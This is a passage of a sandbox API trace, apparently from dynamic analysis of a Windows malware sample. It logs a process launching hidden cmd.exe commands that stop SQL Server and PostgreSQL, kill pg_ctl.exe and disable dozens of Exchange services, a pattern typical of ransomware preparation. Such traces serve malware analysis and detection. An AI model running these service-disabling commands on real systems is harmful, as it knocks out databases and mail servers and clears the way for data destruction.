dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSSQL$SQLEXPRESS", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe24, dwThreadId=0x27c)) returned 1 [0128.004] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0128.334] CloseHandle (hObject=0x1f4) returned 1 [0128.334] CloseHandle (hObject=0x1f0) returned 1 [0128.334] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0128.334] _mbscat (in: param_1=0x29fb50, param_2=0x60ed70 | out: param_1=0x29fb50) returned 0x29fb50 [0128.334] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c taskkill \\/IM pg_ctl.exe \\/F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c taskkill \\/IM pg_ctl.exe \\/F", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe2c, dwThreadId=0xe1c)) returned 1 [0128.342] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0128.595] CloseHandle (hObject=0x1f4) returned 1 [0128.595] CloseHandle (hObject=0x1f0) returned 1 [0128.595] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0128.595] _mbscat (in: param_1=0x29fb50, param_2=0x2886f00 | out: param_1=0x29fb50) returned 0x29fb50 [0128.595] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config postgresql-9.0 start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config postgresql-9.0 start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe98, dwThreadId=0xe8c)) returned 1 [0128.602] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0128.813] CloseHandle (hObject=0x1f4) returned 1 [0128.813] CloseHandle (hObject=0x1f0) returned 1 [0128.813] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0128.813] _mbscat (in: param_1=0x29fb50, param_2=0x60ebb8 | out: param_1=0x29fb50) returned 0x29fb50 [0128.813] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop postgresql-9.0", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop postgresql-9.0", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe74, dwThreadId=0xebc)) returned 1 [0128.820] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0129.122] CloseHandle (hObject=0x1f4) returned 1 [0129.122] CloseHandle (hObject=0x1f0) returned 1 [0129.123] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0129.123] _mbscat (in: param_1=0x29fb50, param_2=0x2881a48 | out: param_1=0x29fb50) returned 0x29fb50 [0129.123] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeAB start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeAB start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xec0, dwThreadId=0xeb8)) returned 1 [0129.130] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0129.379] CloseHandle (hObject=0x1f4) returned 1 [0129.380] CloseHandle (hObject=0x1f0) returned 1 [0129.380] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0129.380] _mbscat (in: param_1=0x29fb50, param_2=0x28837e8 | out: param_1=0x29fb50) returned 0x29fb50 [0129.380] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeAntispamUpdate start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeAntispamUpdate start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xef0, dwThreadId=0xf04)) returned 1 [0129.386] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0129.608] CloseHandle (hObject=0x1f4) returned 1 [0129.608] CloseHandle (hObject=0x1f0) returned 1 [0129.608] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0129.608] _mbscat (in: param_1=0x29fb50, param_2=0x2886f38 | out: param_1=0x29fb50) returned 0x29fb50 [0129.608] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeEdgeSync start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeEdgeSync start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xf48, dwThreadId=0xf3c)) returned 1 [0129.615] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0129.837] CloseHandle (hObject=0x1f4) returned 1 [0129.837] CloseHandle (hObject=0x1f0) returned 1 [0129.837] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0129.837] _mbscat (in: param_1=0x29fb50, param_2=0x28819e8 | out: param_1=0x29fb50) returned 0x29fb50 [0129.837] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeFDS start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeFDS start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xf38, dwThreadId=0xf20)) returned 1 [0129.844] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0130.061] CloseHandle (hObject=0x1f4) returned 1 [0130.061] CloseHandle (hObject=0x1f0) returned 1 [0130.061] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0130.061] _mbscat (in: param_1=0x29fb50, param_2=0x2881a78 | out: param_1=0x29fb50) returned 0x29fb50 [0130.061] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeFBA start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeFBA start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x560, dwThreadId=0x9a0)) returned 1 [0130.068] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0130.342] CloseHandle (hObject=0x1f4) returned 1 [0130.342] CloseHandle (hObject=0x1f0) returned 1 [0130.342] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0130.342] _mbscat (in: param_1=0x29fb50, param_2=0x2886f70 | out: param_1=0x29fb50) returned 0x29fb50 [0130.342] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeImap4 start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeImap4 start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xa58, dwThreadId=0xa54)) returned 1 [0130.349] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0130.558] CloseHandle (hObject=0x1f4) returned 1 [0130.558] CloseHandle (hObject=0x1f0) returned 1 [0130.558] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0130.558] _mbscat (in: param_1=0x29fb50, param_2=0x2881a18 | out: param_1=0x29fb50) returned 0x29fb50 [0130.558] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeIS start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeIS start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x960, dwThreadId=0x674)) returned 1 [0130.566] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0130.792] CloseHandle (hObject=0x1f4) returned 1 [0130.793] CloseHandle (hObject=0x1f0) returned 1 [0130.793] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0130.793] _mbscat (in: param_1=0x29fb50, param_2=0x2883768 | out: param_1=0x29fb50) returned 0x29fb50 [0130.793] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeMailSubmission start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeMailSubmission start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xf6c, dwThreadId=0xf54)) returned 1 [0130.800] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0131.026] CloseHandle (hObject=0x1f4) returned 1 [0131.026] CloseHandle (hObject=0x1f0) returned 1 [0131.026] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0131.026] _mbscat (in: param_1=0x29fb50, param_2=0x2883428 | out: param_1=0x29fb50) returned 0x29fb50 [0131.026] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeMailboxAssistants start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeMailboxAssistants start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xf9c, dwThreadId=0xfa4)) returned 1 [0131.034] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0131.266] CloseHandle (hObject=0x1f4) returned 1 [0131.266] CloseHandle (hObject=0x1f0) returned 1 [0131.266] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0131.266] _mbscat (in: param_1=0x29fb50, param_2=0x28833e8 | out: param_1=0x29fb50) returned 0x29fb50 [0131.266] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeMailboxReplication start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeMailboxReplication start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xfdc, dwThreadId=0xfe4)) returned 1 [0131.274] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0131.529] CloseHandle (hObject=0x1f4) returned 1 [0131.529] CloseHandle (hObject=0x1f0) returned 1 [0131.529] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0131.529] _mbscat (in: param_1=0x29fb50, param_2=0x2886fa8 | out: param_1=0x29fb50) returned 0x29fb50 [0131.529] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeMonitoring start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeMonitoring start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xfc4, dwThreadId=0x168)) returned 1 [0131.537] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0131.834] CloseHandle (hObject=0x1f4) returned 1 [0131.834] CloseHandle (hObject=0x1f0) returned 1 [0131.834] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0131.834] _mbscat (in: param_1=0x29fb50, param_2=0x2885ce0 | out: param_1=0x29fb50) returned 0x29fb50 [0131.834] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangePop3 start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangePop3 start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xff0, dwThreadId=0xc54)) returned 1 [0131.842] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0132.082] CloseHandle (hObject=0x1f4) returned 1 [0132.082] CloseHandle (hObject=0x1f0) returned 1 [0132.082] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0132.082] _mbscat (in: param_1=0x29fb50, param_2=0x2885528 | out: param_1=0x29fb50) returned 0x29fb50 [0132.083] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeProtectedServiceHost start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeProtectedServiceHost start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x1f4, dwThreadId=0xc24)) returned 1 [0132.090] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0132.366] CloseHandle (hObject=0x1f4) returned 1 [0132.367] CloseHandle (hObject=0x1f0) returned 1 [0132.367] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0132.367] _mbscat (in: param_1=0x29fb50, param_2=0x2885d18 | out: param_1=0x29fb50) returned 0x29fb50 [0132.367] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeRepl start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeRepl start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe54, dwThreadId=0xe50)) returned 1 [0132.373] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0132.577] CloseHandle (hObject=0x1f4) returned 1 [0132.577] CloseHandle (hObject=0x1f0) returned 1 [0132.577] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0132.577] _mbscat (in: param_1=0x29fb50, param_2=0x2881aa8 | out: param_1=0x29fb50) returned 0x29fb50 [0132.577] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeRPC start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeRPC start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc90, dwThreadId=0x820)) returned 1 [0132.585] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0132.809] CloseHandle (hObject=0x1f4) returned 1 [0132.809] CloseHandle (hObject=0x1f0) returned 1 [0132.809] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0132.809] _mbscat (in: param_1=0x29fb50, param_2=0x2885d50 | out: param_1=0x29fb50) returned 0x29fb50 [0132.809] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeSearch start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeSearch start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xb3c, dwThreadId=0x620)) returned 1 [0132.821] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0133.072] CloseHandle (hObject=0x1f4) returned 1 [0133.072] CloseHandle (hObject=0x1f0) returned 1 [0133.072] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0133.072] _mbscat (in: param_1=0x29fb50, param_2=0x28817d8 | out: param_1=0x29fb50) returned 0x29fb50 [0133.072] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config wsbexchange start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config wsbexchange start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc7c, dwThreadId=0xc2c)) returned 1 [0133.079] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0133.297] CloseHandle (hObject=0x1f4) returned 1 [0133.297] CloseHandle (hObject=0x1f0) returned 1 [0133.297] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0133.297] _mbscat (in: param_1=0x29fb50, param_2=0x28870f0 | out: param_1=0x29fb50) returned 0x29fb50 [0133.297] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeServiceHost start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeServiceHost start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xcd0, dwThreadId=0xcb8)) returned 1 [0133.361] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 